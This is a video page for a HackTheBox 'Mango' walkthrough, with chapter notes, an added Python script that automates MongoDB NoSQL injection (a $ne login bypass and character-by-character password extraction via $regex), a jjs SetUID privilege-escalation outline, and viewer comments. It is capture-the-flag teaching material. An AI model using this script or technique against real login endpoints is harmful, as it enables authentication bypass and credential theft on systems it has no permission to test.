HackTheBox - Mango

39,199 views

IppSec

4 years ago

01:00 - Start of nmap and examining the HTTPS Certificate to get a potential hostname
04:00 - Doing light testing on the HTTPS site for SQL injection, then sending it to SQLMap. Using --force-ssl to make SQLMap do HTTPS instead of HTTP
06:26 - Playing with analytics.php and some light testing to see if we could do SSRF. Put it on the backburner and move on.
07:42 - Testing the logon prompt on the HTTP Site, playing with SQL Injection and starting another SQLMap
08:51 - Going over NoSQL Injection
09:44 - Attempting to explain NoSQL Injection
11:35 - Performing a NoSQL Injection test via x-www-form-urlencoded data
12:44 - Doing Regular Expressions with NoSQL Injection to extract the password length
14:00 - Explaining how you would have done NoSQL Injection on NodeJS (Sending objects in JSON)
16:00 - Logging into the webserver via NoSQL Injection, running GoBuster with our cookie that is logged in
18:50 - Going back to NoSQL Injection with RegularExpression and Boolean injection to extract the password
19:20 - Going over doing Burp Intruder to extract data
21:45 - Creating a Python script to do this NoSQL Injection, since Burp costs $$ and Intruder is slow.
37:11 - Script mostly done extracting admin's password
40:47 - Trying to extract Mango's password but there's a tricky character, troubleshooting
44:00 - Screwed up a loop and didn't go through all the character space. Getting Mango's password using SSH to login to the box.
46:00 - Running LinPEAS and seeing jjs is a SetUID binary
48:00 - Turns out we can't execute jjs as mango, only as admin. Use "su" to switch to admin and run jjs
50:11 - Using jjs to write a file and drop an SSH key
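The chapters from 08:51 to 44:00 cover one chain: the PHP login form hands the form fields to MongoDB as-is, so `username[$ne]=x&password[$ne]=x` bypasses authentication, `password[$regex]=^.{N}$` leaks the password length, and anchored `^prefix` probes leak it one character at a time, with regex metacharacters in the password (the "tricky character" at 40:47, the `*` false positives in the comments) as the pitfall. The script below is an added example, not IppSec's script and not code from the box. It runs offline: the users, passwords and the tiny MongoDB-like matcher are constructed for the demo, and Python's `re` stands in for MongoDB's PCRE engine, which is an approximation that holds for the anchors, escapes and quantifiers used here. The `login()` oracle is the only thing to swap for a real HTTP request.

```python
"""Boolean-based MongoDB NoSQL injection against a PHP login form, end to end.

Added example, not IppSec's script and not code from the box. PHP fills $_POST
from an application/x-www-form-urlencoded body, so `password[$regex]=^a`
arrives as {'password': {'$regex': '^a'}} and reaches MongoDB unchanged.
Users, passwords and the mock query engine below are constructed for the demo.
"""
import re
import string
from typing import Callable
from urllib.parse import parse_qsl, urlencode

# Constructed documents. The second password deliberately contains regex
# metacharacters: the case that yields false positives if the probe does not
# escape what it has already recovered.
USERS = [
    {"username": "admin", "password": "N0tTheRealOne!"},
    {"username": "mango", "password": "pass*word.v2"},
]

ALPHABET = string.digits + string.ascii_letters + string.punctuation  # '!'..'~'

Oracle = Callable[[str], bool]


def parse_php_body(body: str) -> dict:
    """Parse a form body the way PHP fills $_POST: 'a[b]=c' -> {'a': {'b': 'c'}}."""
    out: dict = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if m:
            out.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            out[key] = value
    return out


def _field_matches(value: str, cond) -> bool:
    """Mock of MongoDB matching for one field: equality, or a dict of operators."""
    if isinstance(cond, str):
        return value == cond
    for op, arg in cond.items():
        if op == "$ne":
            if value == arg:
                return False
        elif op == "$regex":
            if re.search(arg, value) is None:  # $regex is an unanchored search
                return False
        else:
            raise ValueError(f"operator {op} not modelled")
    return True


def login(body: str) -> bool:
    """Mock of the vulnerable endpoint: True when any document matches the query.

    Against a real target this is the function to replace, e.g. (assumption: a
    successful login answers with a redirect):
        r = requests.post(URL, data=body, allow_redirects=False)
        return r.status_code == 302
    """
    q = parse_php_body(body)
    return any(
        _field_matches(u["username"], q.get("username", ""))
        and _field_matches(u["password"], q.get("password", ""))
        for u in USERS
    )


def bypass_login(send: Oracle) -> bool:
    """Authentication bypass: $ne on both fields matches every document."""
    return send(urlencode({"username[$ne]": "x", "password[$ne]": "x"}))


def probe(send: Oracle, user: str, pattern: str) -> bool:
    """One yes/no question: does `user`'s password match `pattern`?"""
    return send(urlencode({"username": user, "password[$regex]": pattern}))


def find_length(send: Oracle, user: str, max_len: int = 64) -> int:
    """Password length first, so the per-character loop knows when to stop."""
    for n in range(1, max_len + 1):
        if probe(send, user, f"^.{{{n}}}$"):
            return n
    raise RuntimeError("no match up to max_len; raise max_len or check the oracle")


def extract_password(send: Oracle, user: str, alphabet: str = ALPHABET) -> str:
    """Recover the password one character at a time with anchored prefix probes."""
    length = find_length(send, user)
    known = ""
    for _ in range(length):
        for c in alphabet:
            # re.escape() makes a recovered '*' or '.' match literally; without it
            # '^pas*' is true for 'pass*word.v2' and the wrong character is kept.
            if probe(send, user, "^" + re.escape(known + c)):
                known += c
                break
        else:  # for/else: no candidate matched, the alphabet is missing a character
            raise RuntimeError(f"no candidate matched after {known!r}")
    if not probe(send, user, "^" + re.escape(known) + "$"):
        raise RuntimeError("final check failed; a probe returned a false positive")
    return known


if __name__ == "__main__":
    print("bypass works:", bypass_login(login))
    for u in USERS:
        print(u["username"], "->", extract_password(login, u["username"]))
```

Two details carry over to the real target: the body is built with `urlencode()` so that `$`, `[`, `]`, `+` and the backslashes from `re.escape()` survive transport (a hand-built string with an unencoded `+` becomes a space on the PHP side), and the final `^...$` probe is what catches a prefix that was accepted by accident.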

Comments: 64
@kiriappeee 4 years ago
I actually found myself clapping at the privilege escalation at the end. Don't ever stop what you are doing, IppSec. It's amazing educational content.
@xxanonymous6578 2 years ago
The minute I saw SQLMap in the preview I knew it was gonna be a good one. Thanks for the video, Mr. IppSec.
@yannickpeter8607 4 years ago
For me the regex part was pure magic. I went full script kiddie and used a working script back in the day I solved the box, but never really understood what it does until now. Was waiting for that video for so long. Thank you, sir!
@MKVD 4 years ago
Same lol, feels wrong that it was so easy with the script :D
@4kwah 4 years ago
I am wondering where you got that script?
@manwuzi 4 years ago
Watching this at 1.75x is like watching a thriller... you're amazing, IppSec
@ulissemini5492 4 years ago
21:35 you scared me there for a second
@CodeXND 4 years ago
and at /.ssh
@silverstar9644 4 years ago
Woah, I was thinking about analytics.php all the time. Great video
@danilas2206 4 years ago
Awesome! It's really cool! Thx for the writeup!
@j3r3miasmg 1 year ago
Two cents: 1 - string.printable; 2 - for loops in Python have an else clause that is called if break is not called
@Guysudai1 4 years ago
About the for loop: I usually do ```for i in range(ord("!"), ord("~") + 1)``` so it's clearer what's going on and I'm not missing any ASCII characters :P
@henrikbjerrenielsen4125 4 years ago
A small hint: use jjs with the -scripting argument, then you can use $EXEC(). Thanks for a great video!
@bloodline211 4 years ago
How exactly do you find out if it's running MongoDB in the backend, other than just looking at the mangos and thinking 'mango, mongo hmmm..'? Because in a real-life situation you'd need to somehow find out what's in the backend.
@medoangel8370 4 years ago
Through nmap, that's the first thing he did
@csmole1231 3 years ago
@@medoangel8370 ? But the nmap said the http-title is mango, still the fruit, not the database... (did I miss anything?) (not to mention http-title can be edited by the web dev, I guess? They can say for example "banana protocol" but that doesn't mean it's really following banana protocol) (weird example I made, but you get the idea :D)
@csmole1231 3 years ago
@@medoangel8370 I was deceived at first as well! Then got so confused why IppSec knew it's MongoDB, hence NoSQL, but was still using SQL injection 😂 loooool
@csmole1231 3 years ago
I checked the HTB forum, they all say stuff like "the name of the box is a big hint" 🤪 idk, maybe in real life you just try both...? 🤣
@kydo2540 3 years ago
So I didn't catch the hint that this was supposed to lead me to MongoDB. How can I identify this in the future without a hint? Just trial and error?
@4kwah 4 years ago
This is great, I am already stuck working on the machine now 😀
@Haxr-dq6wt 3 years ago
So now we have the machine name and the pics of the mango that indicate the server is using MongoDB. In a real-life scenario, how would you discover that the site is using a NoSQL DB, and how would you discover that there is injection in it???
@arvin4348 3 years ago
amazing bro, nice job man
@YOUNES-ep8vs 4 years ago
love you bro!!
@allurbase 4 years ago
:facepalm: I somehow found github/MangoDevelopers and went down a rabbit hole from there, scraping web pages and trying to build a keyword dictionary with mango-related words. Kill me now.
@adrien8768 4 years ago
I love these videos
@nonope449 4 years ago
Python has a string module that has useful subsets of the ASCII characters
@notargb 4 years ago
Hi ^^, I'm wondering: why do you use "$ nmap -sC -sV" instead of "$ nmap -A"? Greetings, and thank you a lot for your content.
@deepanshpahwa5530 4 years ago
I guess -sC -sV is faster than doing -A
@lumenknotty6355 1 year ago
Thank you!
@monzerabas2433 4 years ago
You are the best
@nicoswd 4 years ago
import re; re.escape(str) should also do the trick instead of manually escaping special regex characters
@steps0x029a 2 years ago
Nice hint, thanks! I found that an asterisk character as part of the password leads to false positive matches. Has anyone found a solution for that?
@westernvibes1267 4 years ago
Ipp, is PentesterLab good for learning web exploitation? Or is there any other good resource? I'm pretty weak on web stuff, thinking of practicing some more advanced stuff, like chaining exploits together and WAF evasion.
@zackadzky2265 2 years ago
i like your cut G
@lazarvukasinovic4878 4 years ago
Which desktop environment are you using?
@cantfinddave 4 years ago
When you add an IP, host and alias to /etc/hosts, why do you do that? I tried googling but can't find an answer. It only explains how to do it.
@Thrawen 4 years ago
Some HTTP servers have "virtual host routing". Essentially that means it will serve you different resources based on the "Host" header in the request. In this case it did not serve the page with the IP as hostname, but it did with the hostname found in the SSL cert. By adding it to /etc/hosts you can easily just send a request with that Host header. Alternatively you could just manipulate the header in Burp, but that will get annoying fast.
@cantfinddave 4 years ago
Awesome, thank you
@mikeefpv 4 years ago
nice
@aminhatami3928 4 years ago
Thank you.
@4kwah 4 years ago
I am wondering why the machine is still listed under Active Machines at this moment!
@shubhamgurav634 4 years ago
You can work on that machine for 2 days after retirement
@4kwah 4 years ago
Shubham Gurav, thanks for the clarification!
@mohammadabdussamad2258 4 years ago
@@shubhamgurav634 two days? I thought it would be until the next box gets retired
@evildead7845 4 years ago
Hey everyone, can you tell me blog sites like Medium (12:40) for hacking/pentesting purposes, ofc?
@Splixy 4 years ago
What keyboard are you using?
@michaelyadidya8742 4 years ago
When are you releasing your own box on HTB? 😎😎😎
@awscloudsecurity 4 years ago
Hi @IppSec, thank you for this awesome script for extracting MongoDB data. Could you please comment here on how to learn / which modules are essential for a penetration tester in Python, for learning Python script automation like this? I am waiting for your valuable response.
@sakettestsakettest8009 4 years ago
Was an easy box, but was a bit CTF-like at the login.
@kushalrahatkar4568 3 years ago
Can you please explain to me what he did at the login? How did he find out what to do there?
@cimihan4816 4 years ago
Hi, how do you copy text or something in tmux??
@zacksargent 4 years ago
superuser.com/questions/196060/selecting-text-in-tmux-copy-mode
@cimihan4816 3 years ago
@Kanchho Chhoro now XD
@BlackHermit 4 years ago
re.escape!
@aharonmo4188 4 years ago
:)
@humanflybzzz4568 4 years ago
Yeah, Python did not work for me, had to write a bash script :) As always, it's a great learning exp. to see pros do it after you've stumbled around like a drunken a**hole.
@raffaeleriddle 4 years ago
They should allow new subscribers to pentest retired machines too...
@ippsec 4 years ago
Then people would just keep creating accounts; it's only ~10 for a month of full access.
@raffaeleriddle 4 years ago
@@ippsec Then they should allow everyone to pentest retired machines, just with no credit, only for academic and practical purposes. It'd be a profitable learning method. Thanks for answering btw.
@youssefbenyahia9448 4 years ago
"August left Chris in America. Can you get the flag and reunite them?" A crypto challenge on HackTheBox, plzzz help me
@spacenomad5484 3 years ago
21:15 Is MongoDB regex broken? .* matches any amount of characters, including zero, as shown by egrep and sed: $ echo -n "admin" | egrep -o "admin.*" | sed -e 's/admin.*/still_a_match/g' So why does MongoDB not match? Even egrep and sed agree, which is rare for me. Also, if some regex magician reads this... why do I need to escape every damn "control character" in sed? echo -n "adminn" | sed -e 's/^ad\(mi[n]\+\)$/\1/g'
@lawaace1056 3 years ago
C'mon man hahahaha, you are a legend; seeing you disappoints me as a noob lol
@k5tggiv6ubmmb3as9 4 years ago
first